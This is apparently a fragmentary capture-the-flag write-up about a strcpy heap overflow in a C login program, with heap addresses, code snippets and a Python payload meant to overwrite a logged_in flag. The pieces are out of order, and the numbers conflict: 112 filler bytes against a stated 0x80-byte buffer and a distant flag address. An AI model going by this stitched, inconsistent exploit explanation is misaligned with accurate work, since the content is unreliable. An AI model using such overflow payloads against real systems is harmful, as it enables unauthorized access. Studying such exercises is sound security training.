heap: 0x603010 -> name buffer (0x80)
      0x603090 -> pwd buffer  (0x80)
```c
struct user {
    char *name; // 8 bytes
    char *pwd;  // 8 bytes
};
```
```c
void register_user(void)
{
    /* ... */
    if (/* ... */ !pwd) {
        puts("OOM");
        exit(1);
    }
    /* ... */
```
```c
    strcpy(user->pwd, buf);
```

Thus, an overflow of buf can overflow the heap buffer that user->pwd points to. By providing an over-long password we can write past the allocated 0x80 bytes of pwd and reach the logged_in variable located at 0x603200 (example address).
```c
int main(void)
{
    setbuf(stdout, NULL);
    while (1) {
        menu();
        int choice;
        if (scanf("%d%*c", &choice) != 1)
            break;
        switch (choice) {
        case 1: register_user(); break;
        case 2: login(); break;
        case 3: show_secret(); break;
        case 4: exit(0);
        default: puts("Invalid"); break;
        }
    }
    return 0;
}
```
```python
def login_overwrite(s):
    menu(s)
    s.sendall(b'2\n')
    recvuntil(s, b'Password: ')
    # 112 filler + 0x01 + newline
    payload = b'A' * 112 + b'\x01' + b'\n'
    s.sendall(payload)
```
There is a hidden detail: the program copies the password from the stack buffer into the heap password field using strcpy:
```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
```